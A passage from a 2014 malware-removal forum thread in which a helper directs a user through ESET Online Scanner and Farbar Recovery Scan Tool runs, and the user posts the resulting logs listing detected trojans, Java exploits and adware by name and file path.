"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_152_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_152.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.15"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_152.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_152.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_152.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}]
@Denied: (A 2) (Everyone)
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}\1.0]
@="Shockwave Flash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\TypeLib\{FAB3E735-69C7-453B-A446-B6823C6DF1C9}]
@Denied: (A 2) (Everyone)
@=""
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\TypeLib\{FAB3E735-69C7-453B-A446-B6823C6DF1C9}\1.0]
@="FlashBroker"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Classes]
"SymbolicLinkValue"=hex(6):5c,00,52,00,45,00,47,00,49,00,53,00,54,00,52,00,59,
   00,5c,00,4d,00,41,00,43,00,48,00,49,00,4e,00,45,00,5c,00,53,00,4f,00,46,00,\
.
Completion time: 2014-09-15  09:59:48
ComboFix-quarantined-files.txt  2014-09-15 15:59
.
Pre-Run: 705,712,214,016 bytes free
Post-Run: 724,784,394,240 bytes free
.
- - End Of File - - DB254995081BEC65809DA3794C673CC2
03BA8F890B47C0BE359A4D5A636D214D
 



#5 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:24 PM

Posted 15 September 2014 - 01:37 PM

Ok.


Step 1

Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administartor privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!



Step 2

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#6 mleehogg

mleehogg
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:24 AM

Posted 15 September 2014 - 06:17 PM

ESET Logs:

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=76539011a7ba6a47bde91fda5d32e299
# engine=20166
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-09-15 11:08:23
# local_time=2014-09-15 05:08:23 (-0700, Mountain Daylight Time)
# country="United States"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1='Norton Internet Security'
# compatibility_mode=3595 16777213 100 91 282400 173329088 0 0
# compatibility_mode_1=''
# compatibility_mode=5892 16776573 100 100 0 247421209 0 0
# scanned=323895
# found=20
# cleaned=0
# scan_time=8362
sh=97BCCD25561F44E9B13F05F6EEF083C9CE9BA529 ft=1 fh=641f1fb3d2e699c4 vn="Win32/Toolbar.Conduit.Y potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\Conduit\Community Alerts\Alert.dll.vir"
sh=322D36A63709838E21905B9E1E5BCB9C7FAD3A1D ft=1 fh=2b797d85c681691c vn="Win32/Toolbar.Conduit.AC potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files (x86)\Conduit\CT3309350\plugins\TBVerifier.dll.vir"
sh=7E3ADF617BD3D80329FC4148CF4E819BEA3AACAE ft=1 fh=37b0563bbf495b2d vn="a variant of Win32/Kryptik.CKYO trojan" ac=I fn="C:\ProgramData\Windows Genuine Advantage\{DC3D7A82-550D-4A4F-976B-2286219C3072}\msiexec.exe"
sh=7E3ADF617BD3D80329FC4148CF4E819BEA3AACAE ft=1 fh=37b0563bbf495b2d vn="a variant of Win32/Kryptik.CKYO trojan" ac=I fn="C:\Users\All Users\Windows Genuine Advantage\{DC3D7A82-550D-4A4F-976B-2286219C3072}\msiexec.exe"
sh=438CBE35AFB1F4EDDA2C70A7A77FC9F611529884 ft=0 fh=0000000000000000 vn="Win32/TrojanDownloader.Tracur.V trojan" ac=I fn="C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Users\nkkmebodcglnimjjbopgchmhpbmfdnpk\background.js"
sh=19BF8930EAF23290895C6F617D30677B79AD27C0 ft=0 fh=0000000000000000 vn="JS/Exploit.Agent.NHK trojan" ac=I fn="C:\Users\Guest\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\SPJDWC7Y\3lfin8n5yq[1].htm"
sh=609A8BB3EFD8C7EA39F29A06EC30A88F7FC545C3 ft=0 fh=0000000000000000 vn="a variant of Java/Exploit.Agent.QZU trojan" ac=I fn="C:\Users\Guest\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\7315d872-1f7f06ac"
sh=85DA16CD6282C0B0AB7AA2F65BF912ABDD1766A7 ft=0 fh=0000000000000000 vn="JS/Redirector.NCG trojan" ac=I fn="C:\Users\Hogg\AppData\Local\06f3f051-63b1-4d25-bc86-788f5e8250f9.crx"
sh=DCBD329731A2D52E3C9D89A2D5B620A717DA9002 ft=0 fh=0000000000000000 vn="JS/Redirector.NCG trojan" ac=I fn="C:\Users\Hogg\AppData\Local\71A87F04-31A1-11E2-8271-B8AC6F996F26.crx"
sh=991AD5401B96741DB8125572C067E2F7A5CEB399 ft=0 fh=0000000000000000 vn="a variant of Win32/Toolbar.Conduit.AH potentially unwanted application" ac=I fn="C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx"
sh=438CBE35AFB1F4EDDA2C70A7A77FC9F611529884 ft=0 fh=0000000000000000 vn="Win32/TrojanDownloader.Tracur.V trojan" ac=I fn="C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Users\afkgilhfgajhpdmckpbmdgkapgdjndbb\background.js"
sh=EF10F1B08F42B0F700DFCAD97E91A6190C385DF2 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\152478ce-1a9319eb"
sh=B6583F3B5A942335881FE0CE0DB2F32272268A73 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\fe6cc0e-236666be"
sh=B0298BA71B954F01DD98BA45385773D6106CC897 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\68fc9bd3-264ef294"
sh=E5A133CB1754CC1CC37A32F1EF56049D947D0BE5 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\3ed04b5e-6095ae43"
sh=0BCC4A220D6BD8CDA4C76C178B802D0776A37DF3 ft=1 fh=65c2fdbe46c76e1e vn="a variant of Win32/Kryptik.BETW trojan" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\2b29f3a4-47a69334"
sh=57021C424DF16975EF4A725DE83B328CF6BA513F ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\1cffd5ab-36dfccb7"
sh=0E0A69B6D243F8B5C5B38BB9E77F5BE318DD1BE7 ft=0 fh=0000000000000000 vn="a variant of Java/Exploit.Agent.NNO trojan" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\4c3955ab-5dffbce8"
sh=28188520730B91ACFF3F3C3DAF8800B6CC845F23 ft=0 fh=0000000000000000 vn="a variant of Java/Exploit.Agent.NNO trojan" ac=I fn="C:\Users\Hogg\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\58ddf587-35d058fd"
sh=74C4657701153B9CA169F4EEB10A066BABE0CB72 ft=1 fh=73e0ec9670cf02dc vn="Win32/AdvancedSystemProtector.A potentially unwanted application" ac=I fn="C:\Users\Hogg\Downloads\otsaso3setup_11_9_12.exe"
 



#7 mleehogg

mleehogg
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:24 AM

Posted 15 September 2014 - 06:23 PM

FRST Logs:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 12-09-2014
Ran by Hogg (administrator) on HOGG-PC on 15-09-2014 17:21:09
Running from C:\Users\Hogg\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J5LL7X0R
Platform: Windows Vista ™ Home Premium Service Pack 2 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.141\SSScheduler.exe
(RealNetworks, Inc.) C:\Program Files (x86)\real\realplayer\Update\realsched.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Microsoft Corporation) C:\Windows\splwow64.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [915512 2009-03-05] (Hewlett-Packard)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => c:\program files (x86)\real\realplayer\Update\realsched.exe [295512 2013-10-23] (RealNetworks, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-09-01] (Apple Inc.)
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [1486144 2013-05-13] (IObit)
HKU\S-1-5-21-764796802-3477399101-373240229-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-08-12] (Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.141\SSScheduler.exe (McAfee, Inc.)
BootExecute: autocheck autochk * bootdelete

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?PC=msnHomeST&OCID=msnHomepage
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPDTDF
SearchScopes: HKLM-x32 - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPDTDF
SearchScopes: HKLM-x32 - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=394&systemid=406&apn_dtid=BND406&apn_ptnrs=AG6&o=APN10645&apn_uid=2492936740354564&q={searchTerms}
SearchScopes: HKCU - {4591E5ED-D4E2-45E9-9618-6C9ABFE25973} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3309350&CUI=UN22661023661384124&UM=2
SearchScopes: HKCU - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL =
SearchScopes: HKCU - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL =
SearchScopes: HKCU - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL =
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.141\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO-x32: PasswordBox Helper -> {5DB69B97-934B-451D-94DB-32EF802A01CD} -> C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0552.0\msneshellx.dll (Microsoft Corp.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {5B291E6C-9A74-4034-971B-A4B007A0B315} -  No File
Toolbar: HKCU - No Name - {B7DE27CA-0626-478A-95D6-6C0804782455} -  No File
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: HKLM-x32 {1851174C-97BD-4217-A0CC-E908F60D5B7A} http://h20364.www2.hp.com/CSMWeb/Customer/cabs/HPISDataManager.CAB
DPF: HKLM-x32 {20A60F0D-9AFA-4515-A0FD-83BD84642501} http://messenger.zone.msn.com/binary/msgrchkr.cab56986.cab
DPF: HKLM-x32 {5D6F45B3-9043-443D-A792-115447494D24} http://messenger.zone.msn.com/MessengerGamesContent/GameContent/Default/uno1/GAME_UNO1.cab
DPF: HKLM-x32 {6F15128C-E66A-490C-B848-5000B5ABEEAC} https://h20436.www2.hp.com/ediags/dex/secure/HPDEXAXO.cab
DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab
DPF: HKLM-x32 {8100D56A-5661-482C-BEE8-AFECE305D968} http://upload.facebook.com/controls/2009.07.28_v5.5.8.1/FacebookPhotoUploader55.cab
DPF: HKLM-x32 {C3F79A2B-B9B4-4A66-B012-3EE46475B072} http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Winsock: Catalog5 01 C:\Windows\SysWOW64\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 01 %SystemRoot%\System32\mswsock.dll [304128] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=1.6.0_38 -> C:\Windows\SysWOW64\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll (McAfee, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin-x32: @pack.google.com/Google Updater;version=13 -> C:\Program Files (x86)\Google\Google Updater\2.4.1636.7222\npCIDetect13.dll (Google)
FF Plugin-x32: @real.com/nppl3260;version=16.0.3.51 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.3.51 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Hogg\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-07]
FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn
FF HKLM-x32\...\Firefox\Extensions: [{97E22097-9A2F-45b1-8DAF-36AD648C7EF4}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2013-01-12]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-10-23]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\coFFPlgn [2014-09-15]
FF HKLM-x32\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2

Chrome:
=======
CHR Profile: C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-29]
CHR Extension: (Google Wallet) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-10]
